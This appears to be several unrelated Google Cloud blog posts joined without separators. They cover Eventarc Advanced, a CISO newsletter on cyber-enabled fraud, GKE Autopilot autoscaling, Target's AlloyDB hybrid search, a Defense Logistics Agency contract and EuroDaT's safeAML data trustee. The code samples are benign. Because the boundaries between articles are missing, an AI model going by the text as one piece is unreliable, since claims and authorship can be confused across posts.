Modern application development requires organizations to invest not only in scale but also in simplification and central governance. This takes more than message routing; it requires a simple, unified messaging platform that can intelligently filter, transform, and govern the flow of information in real time, taming complexity in one place.
Today, we are excited to announce the general availability of Eventarc Advanced, a unified, serverless eventing platform that goes beyond simple routing by combining real-time filtering, transformation, management, and delivery in one place, built for complex, multi-source event-driven architectures.
Evolving Eventarc to handle complexity
Eventarc Advanced is an evolution of Eventarc Standard and offers out-of-the-box integration patterns to simplify your eventing needs.
With Eventarc Advanced, organizations can:
Integrate existing services using the Publish API and leverage Google Cloud events to build sophisticated event-driven applications.
Centrally manage, secure, and observe the flow of messages across services with support for per-message fine-grained access control.
Intelligently route messages to appropriate destinations based on flexible message criteria.
Transform and convert events in real-time, with support for multiple payload formats and built-in capability to transform event attributes.
Publish to Google Cloud services using HTTP binding.
With Eventarc Advanced, you can build sophisticated eventing systems. In contrast, Eventarc Standard is best for simple one-to-one eventing needs involving Google Cloud events (comparison).
Eventarc Advanced’s key technical features include:
A Publish API to ingest custom and third-party messages using the CloudEvents format (details).
A message bus that acts as the central nervous system of your event-driven architecture, providing centralized observability, security, and management. The message bus is based on Envoy and uses the policy engine of Cloud Load Balancers and Cloud Service Mesh.
Your existing systems can publish messages to a central message bus, where they can be intelligently routed to appropriate consumers based on flexible criteria. The message bus simplifies event management and reduces operational overhead.
You can gain insights into your message flows with centralized monitoring, logging, and tracing capabilities. Logs are captured in Cloud Logging, providing detailed information about event processing and errors.
Out-of-the-box event mediation capabilities to adapt messages on the fly without modifying your source or destination services, and to handle different events through support for multiple payload formats (Avro, JSON, Protobuf) and built-in capability to transform event attributes.
Eventarc Advanced incorporates error-handling by offering reliable event delivery and graceful recovery from transient failures.
Empowering developers and operators
We designed Eventarc Advanced to cater to the needs of both developers and operators:
“Simplicity” for developers: Focus on building your core application features, not on complex event routing logic. Eventarc Advanced provides a unified API and a consistent experience, letting you build decoupled, reliable, and scalable services including real-time transformations.
“Centralized governance” for platform operators: Simplify the setup and management of your eventing infrastructure. Centralized governance across projects / teams, plus monitoring and logging make it easier to identify and resolve issues, reducing operational overhead.
How Eventarc Advanced works
Imagine an order processing system where orders are created, payments are processed, and items are shipped. Each action is an “event,” and in a complex system, managing this flow can be challenging. This is where Eventarc Advanced comes in. It provides a centralized way to manage, observe, and route all your application’s events. Let’s explore how it works.
Set up your message bus
At the heart of Eventarc Advanced is a message bus that acts as the central nervous system for your event-driven application. Every event, regardless of its origin, is sent to the message bus to be analyzed and routed. This central hub is where you can define security policies, controlling exactly who can send events and what kinds are allowed.
In our example, you would create a message bus to receive all order-related events. Whether an order is newly created, its payment is confirmed, or its status changes to “shipped,” the events land here.
Connect your event sources
Next, connect your sources that generate order events. Event sources are the services and applications that generate events and feed them into your message bus. Eventarc Advanced makes this easy, supporting a wide range of sources, including:
Google API events
External apps or custom systems via Publish API
In our example, the event source could be a custom service using the Publish API. Every time a new order is saved or an existing one is updated, it automatically sends an event to your message bus.
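To make this concrete, here is a minimal, hypothetical sketch of what publishing such an order event from a custom service could look like in Python, using the CloudEvents JSON format. The endpoint path, request body shape, message bus name, and event attributes are assumptions for illustration only; consult the Publish API documentation for the exact contract.

import google.auth
import google.auth.transport.requests
import requests

PROJECT = "my-project"      # placeholder project ID
LOCATION = "us-central1"    # placeholder region
BUS = "orders-bus"          # placeholder message bus name

def publish_order_event(order_id: str, status: str, amount: float) -> None:
    # Obtain an OAuth 2.0 access token from Application Default Credentials.
    credentials, _ = google.auth.default(
        scopes=["https://www.googleapis.com/auth/cloud-platform"]
    )
    credentials.refresh(google.auth.transport.requests.Request())

    # A CloudEvent describing the order, in structured JSON mode.
    event = {
        "specversion": "1.0",
        "id": order_id,
        "source": "//orders-service.example.com",   # illustrative source
        "type": "com.example.order.created",         # illustrative type
        "datacontenttype": "application/json",
        "data": {"orderId": order_id, "status": status, "amount": amount},
    }

    # Assumed publish endpoint for the message bus; verify the exact path and
    # request body in the Eventarc Advanced Publish API reference.
    url = (
        f"https://eventarcpublishing.googleapis.com/v1/projects/{PROJECT}"
        f"/locations/{LOCATION}/messageBuses/{BUS}:publish"
    )
    response = requests.post(
        url,
        headers={"Authorization": f"Bearer {credentials.token}"},
        json={"jsonMessage": event},  # body field name is an assumption
        timeout=10,
    )
    response.raise_for_status()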
Configure pipelines and destinations
This is another area where Eventarc Advanced shines. With events flowing into your message bus, you can configure pipelines to intelligently route them to the correct destinations, allowing you to filter, transform, and direct events with precision; a conceptual sketch of this routing follows the examples below.
In the above example,
New order notification: You can set up a filter that looks for events with status: “new”. This pipeline routes these events to a notification service that sends an order confirmation email to the customer.
Fraud detection: For high-value orders (e.g., amount > $1000), you can apply a transformation and route it to a specialized fraud detection service for analysis.
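The two rules above are, at their core, content-based routing: each pipeline applies a filter (and optionally a transformation) and forwards matching events to its destination. As a conceptual illustration only, not actual Eventarc Advanced configuration (filters there are defined on the message bus and its pipelines, not in application code), the routing decisions could be expressed like this:

from typing import Callable

Event = dict

# Each pipeline pairs a filter predicate with a destination service.
ROUTES: list[tuple[Callable[[Event], bool], str]] = [
    # New order notification: events with status "new" go to the notification service.
    (lambda e: e["data"].get("status") == "new", "notification-service"),
    # Fraud detection: high-value orders (amount > $1000) go to the fraud service.
    (lambda e: e["data"].get("amount", 0) > 1000, "fraud-detection-service"),
]

def destinations(event: Event) -> list[str]:
    """Return every destination whose filter matches the event."""
    return [dest for matches, dest in ROUTES if matches(event)]

# A $1,500 order with status "new" matches both pipelines.
print(destinations({"data": {"status": "new", "amount": 1500}}))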
Unlocking new possibilities
Eventarc Advanced opens up new possibilities for your applications and workflows:
Large-scale application integration: Connect numerous services and agents, enabling them to communicate asynchronously and reliably, even across different event formats and schemas.
Event streaming for AI and analytics: Handle the influx of data from IoT devices and AI workloads by filtering and transforming them before feeding them into your analytics pipelines.
Hybrid and multi-cloud deployments: Extend your event-driven architectures beyond Google Cloud, integrating with on-premises systems and other cloud providers.
What’s next
As today’s applications become increasingly agentic, distributed, and data-driven, the need for efficient and secure event orchestration is more critical than ever. With upcoming native support for Service Extensions, which let you insert custom code into the data path, and for services like Model Armor, Eventarc Advanced’s message bus will provide security and networking controls for agent communications.
Eventarc Advanced is available today. To learn more about Eventarc Advanced, see the documentation. To learn more about event-driven architectures, visit our Architecture Center based on Google Cloud best practices. Get ready to take your event-driven architectures to the next level!
Welcome to the second Cloud CISO Perspectives for August 2025. Today, David Stone and Marina Kaganovich, from our Office of the CISO, talk about the serious risk of cyber-enabled fraud — and how CISOs and boards can help stop it.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
How CISOs and boards can help fight cyber-enabled fraud
By David Stone, director, Office of the CISO, and Marina Kaganovich, executive trust lead, Office of the CISO
Cybercriminals are using IT to rapidly scale fraudulent activity — and directly challenge an organization’s health and reputation. Known as cyber-enabled fraud (CEF), it’s a major revenue stream for organized crime, making it a top concern for board members, CISOs, and other executive leaders.
The financial toll of cyber-enabled fraud on businesses is staggering. The FBI noted that cyber-enabled fraud cost $13.7 billion in 2024, a nearly 10% increase from 2023, and represented 83% of all financial losses reported to the FBI in 2024.
“Regions that are highly cashless and digital-based are more vulnerable to the money-laundering risks of cyber-enabled fraud,” said the international Financial Action Task Force in 2023. “CEF can have [a] significant and crippling financial impact on victims. But the impact is not limited to monetary losses; it can have devastating social and economic implications.”
Tactics used in cyber-enabled fraud, including “ransomware, phishing, online scams, computer intrusion, and business email compromise,” are frequently perceived as posing “high” or “very high” threats, according to Interpol’s 2022 Global Crime Trend Report.
Cyber-enabled fraud drives a complex and dangerous ecosystem, where illicit activities intersect and fuel each other in a vicious cycle. For example, the link between cybercrime and human trafficking is becoming more pronounced, with criminal networks often using the funds obtained through cyber-enabled fraud to fuel operations where trafficked workers are forced to perpetrate “romance baiting” cryptocurrency scams.
Disrupting this ecosystem is a top reason for combating cyber-enabled fraud, yet most efforts to do so are currently fragmented because data, systems, and organizational structures have been siloed. We often see organizations use a myriad of tools and platforms across divisions and departments, which results in inconsistent rule application.
Those weaknesses can limit visibility and hinder comprehensive detection and prevention efforts. Fraud programs in their current state are time-consuming and resource-intensive, and can feel like an endless game of whack-a-mole for the folks on the ground.
At Google Cloud’s Office of the CISO, we believe that a strategic shift toward a proactive, preventive mindset is crucial to helping organizations take stronger action to address cyber-enabled fraud. That starts with a better understanding of the common fraudulent activities that can threaten your business, such as impersonation, phishing, and account takeovers.
From there, it’s essential to build a scalable risk assessment using a consistent approach. We recommend using the Financial Services Information Sharing and Analysis Center’s Cyber Fraud Prevention Framework, which ensures a common lexicon and a unified approach across your entire enterprise. The final piece involves meticulously mapping out the specific workflows where fraudulent activity is most likely to occur.
By categorizing these activities into distinct phases, you can identify the exact points where controls can be implemented, breaking the chain before a threat can escalate into a breach.
In parallel, consider the types of fraud-prevention capabilities that may already be available to support your fraud prevention efforts. Our recent paper on tackling scams and fraud together describes Google Cloud’s efforts in this space, some of which are highlighted below.
Remove scams and fraudulent links, including phishing and executive impersonation, from Google Ads and Google Workspace services through the Financial Services Priority Flagger Program.
Combating cyber-enabled fraud is a key task that CISOs and boards of directors can collaborate on to ensure alignment with executive leadership, especially given the financial and reputational risks. Regular dialogue between boards and CISOs can help build a unified, enterprise-wide strategy that moves from siloed departments and disparate tools to a proactive defense model.
Boardrooms should hear regularly from CISOs and other security experts who understand the intersection of fraud and cybersecurity, and the issues at stake for security practitioners and risk managers. We also recommend that boards regularly ask CISOs about the threat landscape, the fraud risks the business faces, and how best to mitigate those risks.
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Security Summit 2025: Enabling defenders, securing AI innovation: At Security Summit 2025, we’re sharing new capabilities to help secure your AI initiatives, and to help you use AI to make your organization more secure. Read more.
Introducing Cloud HSM as an encryption key service for Workspace CSE: To help highly-regulated organizations meet their encryption key service obligation, we are now offering Cloud HSM for Google Workspace CSE customers. Read more.
From silos to synergy: New Compliance Manager, now in preview: Google Cloud Compliance Manager, now in preview, can help simplify and enhance how organizations manage security, privacy, and compliance in the cloud. Read more.
Going beyond DSPM to protect your data in the cloud, now in preview: Our new DSPM offering, now in preview, provides end-to-end governance for data security, privacy, and compliance. Here’s how it can help you. Read more.
Google named a Leader in IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment: Mandiant, a core part of Google Cloud Security, can empower organizations to navigate critical moments, prepare for future threats, build confidence, and advance their cyber defense programs. Read more.
A fuzzy escape: Vulnerability research on hypervisors: Follow the Cloud Vulnerability Research (CVR) team on their journey to find a virtual machine escape bug. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Threat Intelligence news
PRC-nexus espionage hijacks web traffic to target diplomats: Google Threat Intelligence Group (GTIG) has identified a complex, multifaceted espionage campaign targeting diplomats in Southeast Asia and other entities globally, that we attribute to the People’s Republic of China (PRC)-nexus threat actor UNC6384. Read more.
Analyzing the CORNFLAKE.V3 backdoor: Mandiant Threat Defense has detailed a financially motivated operation in which threat actors work together. One threat actor, UNC5518, has been using the ClickFix technique to gain initial access, and another, UNC5774, has deployed the CORNFLAKE.V3 backdoor to deliver payloads. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
Cyber-resiliency for the rest of us: Errol Weiss, chief security officer, Health-ISAC, joins hosts Anton Chuvakin and Tim Peacock to chat about making organizations more digitally resilient, shifting from a cybersecurity perspective to one that’s broader, and how to increase resilience given tough budget constraints. Listen here.
Linux security, and the detection and response disconnect: Craig Rowland, founder and CEO, Sandfly Security, joins Anton and Tim to discuss the most significant security blind spots on Linux, and the biggest operational hurdles teams face when trying to conduct incident response across distributed Linux environments. Listen here.
Defender’s Advantage: How cybercriminals view AI tools: Michelle Cantos, GTIG senior analyst, joins host Luke McNamara to discuss the latest trends and use cases for illicit AI tools being sold by threat actors in underground marketplaces. Listen here.
Behind the Binary: Scaling bug bounty programs: Host Josh Stroschein is joined by Jared DeMott to discuss managing bug bounty programs at scale and what goes into a good bug report. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
The promise of Google Kubernetes Engine (GKE) is the power of Kubernetes with ease of management, including planning and creating clusters, deploying and managing applications, configuring networking, ensuring security, and scaling workloads. However, when it comes to autoscaling workloads, customers tell us the fully managed mode of operation, GKE Autopilot, hasn’t always delivered the speed and efficiency they need. That’s because autoscaling a Kubernetes cluster involves creating and adding new nodes, which can sometimes take several minutes. That’s just not good enough for high-volume, fast-scale applications.
Enter the container-optimized compute platform for GKE Autopilot, a completely reimagined autoscaling stack for GKE that we introduced earlier this year. In this blog, we take a deeper look at autoscaling in GKE Autopilot, and how to start using the new container-optimized compute platform for your workloads today.
Understanding GKE Autopilot and its scaling challenges
With GKE Autopilot, the fully managed mode of operation for GKE, users are primarily responsible for their applications, while GKE takes on the heavy lifting of managing nodes and node pools, creating new nodes, and scaling applications. With traditional Autopilot, if an application needed to scale quickly, GKE first needed to provision new nodes onto which the application could scale, which sometimes took several minutes.
To circumvent this, users often employed techniques like “balloon pods” — creating dummy pods with low priority to hold onto nodes; this helped ensure immediate capacity for demanding scaling use cases. However, this approach is costly, as it involves holding onto actively unused resources, and is also difficult to maintain.
Introducing the container-optimized compute platform
We developed the container-optimized compute platform with a clear mission: to provide you with near-real-time, vertically and horizontally scalable compute capacity precisely when you need it, at optimal price and performance. We achieved this through a fundamental redesign of GKE’s underlying compute stack.
The container-optimized compute platform runs GKE Autopilot nodes on a new family of virtual machines that can be dynamically resized while they are running, starting from fractions of a CPU, all without disrupting workloads. To improve the speed of scaling and resizing, GKE clusters now also maintain a pool of dedicated, pre-provisioned compute capacity that can be automatically allocated to workloads in response to increased resource demands. More importantly, because with GKE Autopilot you only pay for the compute capacity that you request, this pre-provisioned capacity does not impact your bill.
The result is a flexible compute platform that provides capacity where and when it’s required. Key improvements include:
Up to 7x faster pod scheduling time compared to clusters without container-optimized compute
Significantly improved application response times for applications with autoscaling enabled
Introduction of in-place pod resize in Kubernetes 1.33, allowing for pod resizing without disruption
The container-optimized compute platform also includes a pre-enabled high-performance Horizontal Pod Autoscaler (HPA) profile, which delivers:
Highly consistent horizontal scaling reaction times
Up to 3x faster HPA calculations
Higher resolution metrics, leading to improved scheduling decisions
Accelerated performance for up to 1000 HPA objects
All these features are now available out of the box in GKE Autopilot 1.32 or later.
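For context, workloads opt into horizontal autoscaling through a standard HPA object; the pre-enabled high-performance profile then speeds up how those objects are evaluated. The sketch below creates such an HPA with the Kubernetes Python client; the deployment name, namespace, and utilization target are placeholder assumptions.

from kubernetes import client, config

def create_web_hpa() -> None:
    # Load kubeconfig credentials for the target GKE Autopilot cluster.
    config.load_kube_config()

    hpa = client.V2HorizontalPodAutoscaler(
        metadata=client.V1ObjectMeta(name="web-hpa"),
        spec=client.V2HorizontalPodAutoscalerSpec(
            scale_target_ref=client.V2CrossVersionObjectReference(
                api_version="apps/v1", kind="Deployment", name="web"  # placeholder deployment
            ),
            min_replicas=2,
            max_replicas=50,
            metrics=[
                client.V2MetricSpec(
                    type="Resource",
                    resource=client.V2ResourceMetricSource(
                        name="cpu",
                        target=client.V2MetricTarget(
                            type="Utilization", average_utilization=60
                        ),
                    ),
                )
            ],
        ),
    )
    client.AutoscalingV2Api().create_namespaced_horizontal_pod_autoscaler(
        namespace="default", body=hpa
    )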
The power of the new platform is evident in demonstrations where replica counts are rapidly scaled, showcasing how quickly new pods get scheduled.
How to leverage container-optimized compute
To benefit from these improvements in GKE Autopilot, simply create a new GKE Autopilot cluster based on GKE Autopilot 1.32 or later.
If your existing cluster is on an older version, upgrade it to 1.32 or newer to benefit from the container-optimized compute platform’s new features.
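As a rough sketch, creating such a cluster programmatically with the google-cloud-container Python client could look like the following; the project, location, and cluster name are placeholders, the release channel is an assumption (pick one whose default version is 1.32 or later), and gcloud or Terraform work just as well.

from google.cloud import container_v1

def create_autopilot_cluster(project_id: str, location: str, name: str) -> None:
    client = container_v1.ClusterManagerClient()

    cluster = container_v1.Cluster(
        name=name,
        autopilot=container_v1.Autopilot(enabled=True),  # Autopilot mode
        release_channel=container_v1.ReleaseChannel(
            channel=container_v1.ReleaseChannel.Channel.REGULAR
        ),
    )
    request = container_v1.CreateClusterRequest(
        parent=f"projects/{project_id}/locations/{location}",
        cluster=cluster,
    )
    operation = client.create_cluster(request=request)
    print(f"Cluster create operation started: {operation.name}")

# create_autopilot_cluster("my-project", "us-central1", "autopilot-demo")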
To optimize performance, we recommend that you utilize the general purpose compute class for your workload. While the container-optimized compute platform supports various types of workloads, it works best with services that require gradual scaling and small (2 CPU or less) resource requests like web applications.
While the container-optimized compute platform is versatile, it is not currently suitable for specific deployment types:
One-pod-per-node deployments, such as anti-affinity situations
Batch workloads
The container-optimized compute platform marks a significant leap forward in improving application autoscaling within GKE and will unlock more capabilities in the future. We encourage you to try it out today in GKE Autopilot.
Editor’s note: Target set out to modernize its digital search experience to better match guest expectations and support more intuitive discovery across millions of products. To meet that challenge, they rebuilt their platform with hybrid search powered by filtered vector queries and AlloyDB AI. The result: a faster, smarter, more resilient search experience that’s already improved product discovery relevance by 20% and delivered measurable gains in performance and guest satisfaction.
The search bar on Target.com is often the first step in a guest’s shopping journey. It’s where curiosity meets convenience and where Target has the opportunity to turn a simple query into a personalized, relevant, and seamless shopping experience.
Our Search Engineering team takes that responsibility seriously. We wanted to make it easier for every guest to find exactly what they’re looking for — and maybe even something they didn’t know they needed.
That meant rethinking search from the ground up.
We set out to improve result relevance, support long-tail discovery, reduce dead ends, and deliver more intuitive, personalized results.
As we pushed the boundaries of personalization and scale, we began reevaluating the systems that power our digital experience. That journey led us to reimagine search using hybrid techniques that bring together traditional and semantic methods and are backed by a powerful new foundation built with AlloyDB AI.
Hybrid search is where carts meet context
Retail search is hard. You’re matching guest expectations, which can sometimes be expressed in vague language, against an ever-changing catalog of millions of products. Now that generative AI is reshaping how customers engage with brands, we know traditional keyword search isn’t enough.
That’s why we built a hybrid search platform combining classic keyword matching with semantic search powered by vector embeddings. It’s the best of both worlds: exact lexical matches for precision and contextual meaning for relevance. But hybrid search also introduces technical challenges, especially when it comes to performance at scale.
Fig. 1: Hybrid Search blends two powerful approaches to help guests find the most relevant results
Choosing the right database for AI-powered retrieval
Our goals were to surface semantically relevant results for natural language queries, apply structured filters like price, brand, or availability, and deliver fast, personalized search results even during peak usage times. So we needed a database that could power our next-generation hybrid search platform by supporting real-time, filtered vector search across a massive product catalog, while maintaining millisecond-level latency even during peak demand.
We did this by using a multi-index design that yields highly relevant results by fusing the flexibility of semantic search with the precision of keyword-based retrieval. In addition to retrieval, we developed a multi-channel relevance framework that dynamically modifies ranking tactics in response to contextual cues like product novelty, seasonality, personalization and other relevance signals.
Fig. 2: High-level architecture of the services being built within Target
We had been using a different database for similar workloads, but it required significant tuning to handle filtered approximate nearest neighbor (ANN) search at scale. As our ambitions grew, it became clear we needed a more flexible, scalable backend that also provided the highest quality results with the lowest latency. We took this problem to Google to explore the latest advancements in this area, and of course, Google is no stranger to search!
AlloyDB for PostgreSQL stood out, as Google Cloud had infused the underlying techniques from Google.com search into the product to enable any organization to build high quality experiences at scale. It also offered PostgreSQL compatibility with integrated vector search, the ScaNN index, and native SQL filtering in a fully managed service. That combination allowed us to consolidate our stack, simplify our architecture, and accelerate development. AlloyDB now sits at the core of our search system to power low-latency hybrid retrieval that scales smoothly across seasonal surges and for millions of guest search sessions every day while ensuring we serve more relevant results.
Filtered vector search at scale
Guests often search for things like “eco-friendly water bottles under $20” or “winter jackets for toddlers.” These queries blend semantic nuance with structured constraints like price, category, brand, sizes or store availability. With AlloyDB, we can run these hybrid queries that combine vector similarity and SQL filters easily without sacrificing speed or relevance.
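As an illustrative sketch (not Target's actual schema), a filtered vector query of this kind might look like the following in Python with psycopg2, where the products table, its columns, and the embedding representation are assumptions:

import psycopg2

def filtered_vector_search(conn, query_embedding, max_price, category, limit=20):
    """Combine ANN vector similarity with structured SQL filters in one query."""
    sql = """
        SELECT product_id, title, price
        FROM products
        WHERE price <= %s
          AND category = %s
          AND in_stock
        ORDER BY embedding <=> %s::vector  -- distance operator served by the vector index
        LIMIT %s;
    """
    # pgvector-style text literal for the query embedding, e.g. '[0.12, -0.03, ...]'.
    embedding_literal = "[" + ",".join(str(x) for x in query_embedding) + "]"
    with conn.cursor() as cur:
        cur.execute(sql, (max_price, category, embedding_literal, limit))
        return cur.fetchall()

# Usage (connection details and the embed() call are placeholders):
# conn = psycopg2.connect(host="10.0.0.5", dbname="catalog", user="app", password="...")
# rows = filtered_vector_search(conn, embed("eco-friendly water bottle"), 20.0, "water bottles")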
The move has delivered measurable gains:
Up to 10x faster execution compared to our previous stack
Product discovery relevance improved by 20%
The number of “no results” queries cut in half
These improvements have extended deeper into our operations. We’ve reduced vector query response times by 60%, which resulted in a significant improvement in the guest experience. During high-traffic events, AlloyDB has consistently delivered more than 99.99% uptime, giving us confidence that our digital storefront can keep pace with demand when it matters most. Since search is an external-facing, mission-critical service, we deploy multiple AlloyDB clusters across multiple regions, allowing us to achieve even higher effective reliability. These reliability gains have also led to fewer operational incidents, so our engineering teams can devote more time to experimentation and feature delivery.
Fig 3: AlloyDB AI helps Target combine structured and unstructured data with SQL and vector search. For example, this improved search experience now delivers more seasonally relevant styles (i.e., long sleeves) on page one!
AlloyDB’s cloud-first architecture and features give us the flexibility to handle millions of filtered vector queries per day and support thousands of concurrent users – no need to overprovision or compromise performance.
Building smarter search with AlloyDB AI
What’s exciting is how quickly we can iterate. AlloyDB’s managed infrastructure and PostgreSQL compatibility let us move fast and experiment with new ranking models, seasonal logic, and even AI-native features like:
Semantic ranking in SQL: We can prioritize search results based on relevance to the query intent.
Natural language support: Our future interfaces will let guests search the way they speak – no more rigid filters or dropdowns.
AlloyDB offers state-of-the-art models and natural language support in addition to the ScaNN vector index. Google’s commitment and leadership in AI, infused into AlloyDB, has given us the confidence to evolve our service at the pace of the overall AI and data landscape.
The next aisle over: What’s ahead for Target
Search at Target is evolving into something far more dynamic – an intelligent, multimodal layer that helps guests connect with what they need, when and how they need it. As our guests engage across devices, languages, and formats, we want their experience to feel seamless and smart.
With AlloyDB AI and Google Cloud’s rapidly evolving data and AI stack, we’re confident in our ability to stay ahead of guest expectations and deliver more personalized, delightful shopping moments every day.
Note from Amit Ganesh, VP of Engineering at Google Cloud:
Target’s journey is a powerful example of how enterprises are already transforming search experiences using AlloyDB AI. As Vishal described, filtered vector search is unlocking new levels of relevance and scale. At Google Cloud, we’re continuing to expand the capabilities of AlloyDB AI to support even more intelligent, agent-driven, multimodal applications. Here’s what’s new:
Agentspace integration: Developers can now build AI agents that query AlloyDB in real time, combining structured data with natural language reasoning.
AlloyDB natural language: Applications can securely query structured data using plain English (or French, or 250+ other languages) backed by interactive disambiguation and strong privacy controls.
Enhanced vector support: With AlloyDB’s ScaNN index and adaptive query filtering, vector search with filters now performs up to 10x faster.
AI query engine: SQL developers can use natural language expressions to embed Gemini model reasoning directly into queries.
Three new models: AlloyDB AI now supports Gemini’s text embedding model, a cross-attention reranker, and a multimodal model that brings vision and text into a shared vector space.
These capabilities are designed to accelerate innovation – whether you’re improving product discovery like Target or building new agent-based interfaces from the ground up.
The backbone of U.S. national defense is a resilient, intelligent, and secure supply chain. The Defense Logistics Agency (DLA) manages this critical mission, overseeing the end-to-end global supply chain for all five military services, military commands, and a host of federal and international partners.
Today, Google Public Sector is proud to announce a new $48 million contract with the DLA to support its vital mission. Through a DLA Enterprise Platform agreement, Google Public Sector will provide a modern, secure, and AI-ready cloud foundation to enhance DLA’s operational capabilities and provide meaningful cost savings. This marks a pivotal moment for the DoD: a move away from legacy government clouds and onto a modern, born-in-the-cloud provider that is also a DoD-accredited commercial cloud environment.
The Need for a Modern Foundation
To effectively manage a supply chain of global scale and complexity, DLA requires access to the most advanced digital tools available. Previously, DLA, like many other agencies and organizations across the federal government, was restricted to a “GovCloud” environment, an isolated and often less-reliable version of a commercial cloud. These limitations created challenges in data visualization, interoperability between systems, and network resiliency, while also contributing to high infrastructure and support costs.
The driver for change was clear: a need for a modern, scalable, and secure platform to ensure mission success into the future. By migrating to Google Cloud, DLA will be able to harness modern cloud best practices combined with Google’s highly performant and resilient cloud infrastructure.
A Modern, Secure, and Intelligent Platform
DLA leadership embraced a forward-thinking approach to modernization, partnering with Google Public Sector to deploy the DLA Enterprise Platform. This multi-phased approach provides a secure, intelligent foundation for transformation, delivering both immediate value and a long-term modernization roadmap.
The initial phase involved migrating DLA’s key infrastructure and data onto Google Cloud, which will provide DLA with an integrated suite of services to unlock powerful data analytics and AI capabilities, turning vast logistics data into actionable intelligence with tools like BigQuery, Looker, and Vertex AI Platform. Critically, the platform is protected end-to-end by Google’s secure-by-design infrastructure and leading threat intelligence, ensuring DLA’s mission is defended against sophisticated cyber threats.
By leveraging Google Cloud, DLA will be empowered to:
Optimize logistics and reduce costs through the migration of business planning resources to a more efficient, born-in-the-cloud infrastructure.
Enhance decision-making with advanced AI/ML for warehouse modernization and transportation management.
Improve collaboration through a more connected and interoperable technology ecosystem.
Strengthen security by defending against advanced cyber threats with Mandiant’s expertise and Google Threat Intelligence.
Google Public Sector’s partnership with DLA builds on the momentum of its recent $200 million-ceiling contract award by the DoD’s Chief Digital and Artificial Intelligence Office (CDAO) to accelerate AI and cloud capabilities across the agency. We are honored to support DLA’s mission as it takes this bold step into the future of defense logistics.
Register to attend our Google Public Sector Summit taking place on Oct. 29, 2025, in Washington, D.C. Designed for government leaders and IT professionals, 1,000+ attendees will delve into the intersection of AI and security with agency and industry experts, and get hands-on with Google’s latest AI technologies.
A guest post by Dr. Alexander Alldridge, Managing Director of EuroDaT
Fighting money laundering is a team effort. Banks, governments, and technology partners must work closely together to effectively uncover criminal networks. This challenge is especially complex in the tightly regulated financial sector: how do you reconcile data when the data in question is highly sensitive? In this blog post, Dr. Alexander Alldridge, Managing Director of EuroDaT, explains the role a data trustee can play here, and how EuroDaT has used Google Cloud solutions to build a scalable, GDPR-compliant infrastructure for exactly this purpose.
When a bank notices a suspicious transaction, a delicate coordination process begins. To trace possible money flows, it asks other banks for information about specific transactions or accounts. Today this mostly happens over the phone, not because digital alternatives don’t exist, but because passing on sensitive financial data such as IBANs or account activity is only permitted under very narrow legal conditions.
This back-and-forth by phone is not only tedious but also error-prone. A digital data exchange that gives only authorized parties access to exactly the information they need in a specific suspicious case would be significantly faster and more secure.
Here at EuroDaT, a subsidiary of the German state of Hesse, we offer exactly that: as Europe’s first transaction-based data trustee, we enable a controlled, case-by-case exchange of sensitive financial data that protects confidential information and meets all legal requirements.
safeAML: A new way to exchange data in the financial sector
With safeAML, we have worked with Commerzbank, Deutsche Bank, and N26 to develop a system that digitizes the exchange of information between financial institutions. Instead of laboriously phoning other institutions, in the future each bank will be able to pull in the relevant data from other banks itself to better assess suspicious transactions.
The data exchange is controlled and privacy-compliant: data is processed in pseudonymized form and passed on in such a way that only the requesting bank can re-identify it at the end. As the data trustee, we at EuroDaT never have access to personal content at any point.
The safeAML application
The highest security and compliance standards with Google Cloud
safeAML is a cloud-native application, meaning it is developed and operated entirely in the cloud. That requires an infrastructure that is not only technically capable but also meets the strict requirements of the financial sector, from the GDPR to industry-specific security and cyber-resilience requirements. Google Cloud provides a strong foundation for this because the Google Cloud team laid the right technical and contractual groundwork for such sensitive use cases early on. For us, that was a decisive advantage over other providers.
Our entire infrastructure is built on Google Kubernetes Engine (GKE). On top of it, we set up secure, isolated environments in which every request can be processed traceably and separately from others. All technical resources, including our Virtual Private Clouds (VPCs), are defined in the Google Cloud environment as infrastructure as code. This means that EuroDaT’s entire infrastructure is built up in an automated, repeatable way, including the rules governing which data may flow where.
This transparent, easily reproducible architecture also helps us meet the strict compliance requirements of the financial sector: we can demonstrate at any time that security-relevant requirements are implemented and verified automatically.
Banks use safeAML for faster review of suspicious activity
safeAML is now being piloted at the first German banks to help them assess suspicious transactions faster and more accurately. Instead of having to reach for the phone as usual, investigators can now obtain targeted supplementary information from other institutions without exposing sensitive data.
This not only speeds up the review but also reduces the false positives that have so far tied up a great deal of time and capacity. The decision on whether to report suspected money laundering remains a human, case-by-case judgment, as German law requires.
That banks can exchange data in a controlled way via safeAML for the first time is already a major step for anti-money-laundering efforts in Germany. But we are still at the beginning: the next step is to bring more banks on board, expand the network nationally and internationally, and make the process as straightforward as possible. The more institutions take part, the more complete a picture we can draw of suspicious money flows. Going forward, this new data foundation can also help classify suspicious cases more accurately and assess them on a sounder basis.
Sustainable data protection: secure exchange of ESG data
Our solution is not limited to the financial sector, however. As a data trustee, we can apply the basic principle of making sensitive data accessible only in a targeted, controlled way between authorized parties to many other areas as well. In doing so, we always work with partners who implement their application ideas on EuroDaT, while we ourselves remain neutral as the data trustee.
EuroDaT’s service offering
A current example is ESG data: not only large companies but also small and medium-sized enterprises are under growing pressure to disclose sustainability metrics, whether because of new legal requirements or because business partners such as banks and insurers demand them.
Meeting these requirements is particularly difficult for smaller companies. They often lack the structures or resources to provide ESG data in a standardized form, and they understandably don’t want to simply make sensitive information such as consumption data public.
This is where EuroDaT comes in: as a trusted intermediary, we ensure that sustainability data is passed on securely without companies losing control over it. We are currently in talks with the German Sustainability Code (Deutscher Nachhaltigkeitskodex, DNK) about a solution that can make it easier for small companies to transmit ESG data to banks, insurers, and investors via EuroDaT as the data trustee.
Research in the healthcare sector: sensitive data, secure insights
We also see great potential for our technology in the healthcare sector. This naturally involves particularly sensitive data that may only be processed under strict conditions. Nevertheless, there are many cases in which health data needs to be brought together, for example for basic research, the design of clinical trials, and policy decisions.
